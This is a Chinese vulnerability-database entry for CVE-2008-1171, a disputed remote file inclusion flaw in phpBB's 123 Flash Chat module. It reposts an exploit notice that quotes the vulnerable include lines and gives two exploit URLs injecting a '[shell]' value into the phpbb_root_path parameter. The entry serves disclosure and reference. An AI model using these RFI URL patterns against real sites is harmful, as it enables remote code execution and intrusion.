phpbb 123 Flash Chat 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1187491 漏洞类型 代码注入
发布时间 2008-03-05 更新时间 2008-09-05
CVE编号 CVE-2008-1171 CNNVD-ID CNNVD-200803-060
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2008030009
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200803-060
|漏洞详情
**有争议的**phpBB的123FlashChat模块中的多个PHP远程文件包含漏洞,允许远程攻击者借助一个URL,执行任意的PHP代码。该URL存在于(1)123flashchat.php和(2)phpbb_login_chat.php的phpbb_root_path参数中。注意:CVE对此漏洞存有争议,因为$phpbb_root_path在两个程序中都已经很明确地发送到"./"了。
|漏洞EXP
########################################################################
#################

Script          : 123 Flash Chat Module for phpBB                                       #

Discovered By   : F10                                                                   #

Contact         : by_f10 (at) hotmail (dot) com [email concealed]                                                    #

Site            : http://by-f10.com                                                     #

Greetz          : by_emR3 , H0tturk , TaRanTuLa , gsy , ercu_145 ,                      #

LupuS , m0sted , CyberGhost ... .                                     #

From            : Turkey                                                                #

Download        : http://php.arsivimiz.com/indir.php?ID=996&sIslem=Indir                #

########################################################################
#################

The bugs are in :

path/123flashchat.php	   include($phpbb_root_path . 'extension.inc');

path/123flashchat.php      include($phpbb_root_path . 'common.'.$phpEx);

path/phpbb_login_chat.php  include($phpbb_root_path . 'extension.inc');

path/phpbb_login_chat.php  include($phpbb_root_path . 'common.'.$phpEx);

exploitz :

www.site.com/path/123flashchat.php?phpbb_root_path=[shell]

www.site.com/path/phpbb_login_chat.php?phpbb_root_path=[shell]
|参考资料

来源:BUGTRAQ
名称:20080228Re:123FlashChatModuleforphpBB
链接:http://www.securityfocus.com/archive/1/archive/1/488922/100/0/threaded
来源:BUGTRAQ
名称:20080228123FlashChatModuleforphpBB
链接:http://www.securityfocus.com/archive/1/archive/1/488914/100/0/threaded
来源:VIM
名称:20080305false:123FlashChatRFI
链接:http://www.attrition.org/pipermail/vim/2008-March/001913.html
来源:SREASON
名称:3716
链接:http://securityreason.com/securityalert/3716